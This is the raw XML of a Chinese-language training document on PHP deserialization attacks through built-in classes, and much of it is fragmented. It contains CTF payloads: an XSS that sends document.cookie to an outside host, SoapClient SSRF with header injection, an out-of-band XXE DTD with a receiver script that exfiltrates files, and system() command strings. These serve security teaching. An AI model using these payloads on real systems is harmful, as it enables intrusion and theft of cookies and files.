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A6A4" w14:textId="77777777" w:rsidR="008C7C2B" w:rsidRDefault="008C7C2B" w:rsidP="008C7C2B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Web攻防-PHP反序列化&amp;原生内置&amp;Exception类&amp;SoapClient类&amp;SimpleXMLElement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE7C095" w14:textId="2A281AD4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2EE73B6" wp14:editId="7B7DF4DF">
            <wp:extent cx="5270500" cy="164655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209F" w14:textId="77777777" w:rsidR="008C7C2B" w:rsidRDefault="008C7C2B" w:rsidP="008C7C2B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-SSTI-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触发规则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生成及利用条件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-Exception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-SimpleXMLElement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6AF43D6A" w14:textId="5AC03F87" w:rsidR="008C7C2B" w:rsidRDefault="008C7C2B" w:rsidP="008C7C2B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0D9D1AE" wp14:editId="2E610316">
            <wp:extent cx="5270500" cy="58502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FA8D" w14:textId="56D2AA41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F4DBB69" wp14:editId="0E4060EA">
            <wp:extent cx="5274310" cy="3104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D48F" w14:textId="6DC56303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41B624B" wp14:editId="5E689913">
            <wp:extent cx="5274310" cy="1817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238E" w14:textId="3C20AAEF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996A519" wp14:editId="34019793">
            <wp:extent cx="5274310" cy="504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BB80" w14:textId="53C28694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3487F5B" wp14:editId="3D3C7789">
            <wp:extent cx="5274310" cy="731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1131" w14:textId="77777777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97D49A9" w14:textId="77777777" w:rsidR="008C7C2B" w:rsidRDefault="008C7C2B" w:rsidP="008C7C2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WEB攻防-PHP反序列化-魔术方法&amp;触发规则</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367FAF76" w14:textId="77777777" w:rsidR="008C7C2B" w:rsidRDefault="008C7C2B" w:rsidP="008C7C2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WEB攻防-PHP反序列化-漏洞引发&amp;POP链构造</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7B1E41" w14:textId="77777777" w:rsidR="008C7C2B" w:rsidRDefault="008C7C2B" w:rsidP="008C7C2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WEB攻防-PHP反序列化-原生类&amp;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Exception</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>&amp;XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D447C08" w14:textId="77777777" w:rsidR="008C7C2B" w:rsidRDefault="008C7C2B" w:rsidP="008C7C2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WEB攻防-PHP反序列化-原生类&amp;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SoapClient</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>&amp;SSRF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6756FF45" w14:textId="77777777" w:rsidR="008C7C2B" w:rsidRDefault="008C7C2B" w:rsidP="008C7C2B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WEB攻防-PHP反序列化-原生类&amp;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SimpleXMLElement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>&amp;XXE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8BD508" w14:textId="77777777" w:rsidR="008C7C2B" w:rsidRDefault="008C7C2B" w:rsidP="008C7C2B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、什么是反序列化操作？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类型转换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PHP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JavaEE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NET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序列化：对象转换为数组或字符串等格式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反序列化：将数组或字符串等格式转换成对象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将对象转换成一个字符串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unserialize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将字符串还原成一个对象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魔术方法？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对象逻辑（见图）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__construct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当对象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的时候会自动调用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__destruct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当对象被销毁时会被自动调用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__sleep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//serialize()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执行时被自动调用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__wakeup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//unserialize()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时会被自动调用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__invoke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当尝试以调用函数的方法调用一个对象时会被自动调用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__toString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把类当作字符串使用时触发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调用某个方法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若不存在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则会去调用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__call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函数。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__callStatic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在静态上下文中调用不可访问的方法时触发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读取对象属性时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若不存在，则会调用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__get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函数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设置对象的属性时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若不存在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则调用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__set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函数。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__isset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在不可访问的属性上调用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isset()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empty()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触发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__unset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在不可访问的属性上使用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unset()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时触发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__set_state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，调用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var_export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导出类时，此静态方法会被调用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__clone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，当对象复制完成时调用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__autoload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，尝试加载未定义的类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__debugInfo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，打印所需调试信息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、为什么会出现安全漏洞？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原理：未对用户输入的序列化字符串进行检测，导致攻击者可以控制反序列化过程，从而导致代码执行，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注入，目录遍历等不可控后果。在反序列化的过程中自动触发了某些魔术方法。当进行反序列化的时候就有可能会触发对象中的一些魔术方法。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$cmd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function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__destruct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函数引用，无对象创建触发魔术方法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unserialize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'x'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、反序列化漏洞如何利用？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：面向属性编程（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Property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Oriented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Programing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）常用于上层语言构造特定调用链的方法，序列化攻击都在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魔术方法中出现可利用的漏洞，因自动调用触发漏洞，但如关键代码没在魔术方法中，而是在一个类的普通方法中。这时候就可以通过构造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链寻找相同的函数名将类的属性和敏感函数的属性联系起来。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反序列化常见起点（见图）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反序列化常见跳板（见图）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反序列化常见终点（见图）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portswigger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portswigger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security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labs#insecure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deserialization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"username"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"wiener"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"admin"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;}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"username"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"administrator"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"access_token"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;}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:{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"username"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"wiener"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"access_token"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"elrtoxj3rcx3n1ip4u723mk839qht90h"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"avatar_link"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19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"users/wiener/avatar"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训练链构造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254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对象引用执行逻辑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255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反序列化变量修改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$isVip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echo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urlencode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isVip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256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'xiaodi'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public $password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'xiaodisec'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$isVip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echo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urlencode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xiaodisec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A6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isVip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257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对象调用逻辑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'backDoor'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 xml:space="preserve">public function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__construct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backDoor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backDoor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'system("tac flag.php");'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echo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urlencode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backDoor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A23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258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反序列化参数修改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对象调用逻辑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$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'backDoor'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function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__construct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backDoor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backDoor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public $code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"system('tac flag.php');"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serialize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str_replace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':11'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':+11'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str_replace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':8'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':+8'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echo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urlencode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B11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ctfShowUser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A5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BO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backDoor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A4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A23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28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27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22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%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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02785B04" w14:textId="77777777" w:rsidR="008C7C2B" w:rsidRDefault="008C7C2B" w:rsidP="008C7C2B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原生自带类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参考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https://xz.aliyun.com/news/8792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https://www.anquanke.com/post/id/264823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https://blog.csdn.net/cjdgg/article/details/115314651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利用条件：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、有触发魔术方法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、魔术方法有利用类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、部分自带类拓展开启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生成原生类：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$classes = get_declared_classes();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foreach ($classes as $class)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$methods = get_class_methods($class);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foreach ($methods as $method)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if (in_array($method, array(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'__construct',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'__destruct',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'__toString',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'__wakeup',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'__call',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'__callStatic',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'__get',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'__set',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'__isset',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'__unset',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'__invoke',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'__set_state'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)))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print $class . '::' . $method . "\n";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Error/Exception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highlight_file(__file__);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 = unserialize($_GET['code']);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$a;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输出对象可调用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__toString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无代码通过原生类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Exception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-Exception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使用查询编写利用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通过访问触发输出产生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$a=new Exception("&lt;script&gt;alert('xiaodi')&lt;/script&gt;");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urlencode(serialize($a));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[BJDCTF 2nd]xss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$poc = new Exception("&lt;script&gt;window.open('http://462795d3-ea59-4f00-9657-d50f15178248.node5.buuoj.cn:81/?'+document.cookie);&lt;/script&gt;");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urlencode(serialize($poc));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$s = unserialize($_GET['ssrf']);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$s-&gt;a();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输出对象可调用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无代码通过原生类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SoapClient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使用查询编写利用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通过访问触发服务器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 = new SoapClient(null,array('location'=&gt;'http://192.168.1.4:2222/aaa', 'uri'=&gt;'http://192.168.1.4:2222'));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$b = serialize($a);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$b;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CTFSHOW-259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不存在的方法触发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无代码通过原生类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SoapClient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-SoapClient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使用查询编写利用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通过访问本地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Flag.php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$ua="aaa\r\nX-Forwarded-For:127.0.0.1,127.0.0.1\r\nContent-Type:application/x-www-form-urlencoded\r\nContent-Length:13\r\n\r\ntoken=ctfshow";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$client=new SoapClient(null,array('uri'=&gt;'http://127.0.0.1/','location'=&gt;'http://127.0.0.1/flag.php','user_agent'=&gt;$ua));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urlencode(serialize($client));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SimpleXMLElement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$sxe=new SimpleXMLElement('http://192.168.1.4:82/76/oob.xml',2,true);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$a = serialize($sxe);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$a;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不存在的方法触发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__construct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无代码通过原生类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SimpleXMLElement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-SimpleXMLElement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使用查询编写利用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[SUCTF 2018]Homework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SimpleXMLElement(url,2,true)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oob.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&lt;?xml version="1.0"?&gt;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&lt;!DOCTYPE ANY[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remote SYSTEM "http://ip/send.xml"&gt;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%remote;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%all;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%send;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]&gt;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send.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ml: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file SYSTEM "php://filter/read=convert.base64-encode/resource=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.php"&gt;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&lt;!ENTITY % all "&lt;!ENTITY &amp;#x25; send SYSTEM 'http://ip/send.php?file=%file;'&gt;"&gt;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send.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&lt;?php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file_put_contents("result.txt", $_GET['file']) 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Poc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/show.php?module=SimpleXMLElement&amp;args[]=http://120.27.152.29/oob.xml&amp;args[]=2&amp;args[]=true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E486A63" w14:textId="77777777" w:rsidR="008C7C2B" w:rsidRDefault="008C7C2B" w:rsidP="008C7C2B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4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B26522E" w14:textId="77777777" w:rsidR="008C7C2B" w:rsidRDefault="008C7C2B" w:rsidP="008C7C2B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4BDEDB7D" w14:textId="77777777" w:rsidR="00557180" w:rsidRDefault="00557180"/>
    <w:sectPr w:rsidR="0055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1E1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="10BA0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1D"/>
    <w:rsid w:val="00557180"/>
    <w:rsid w:val="008C7C2B"/>
    <w:rsid w:val="009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BBDA-11F0-4D84-983B-AB53A52D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C2B"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体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C7C2B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paragraph">
    <w:name w:val="paragraph"/>
    <w:basedOn w:val="a"/>
    <w:semiHidden/>
    <w:rsid w:val="008C7C2B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8C7C2B"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTML">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="HTML0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008C7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7C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7C2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C7C2B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7C2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7C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2025-05-23T05:54:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-23T05:54:00Z</dcterms:modified>
</cp:coreProperties>
</file>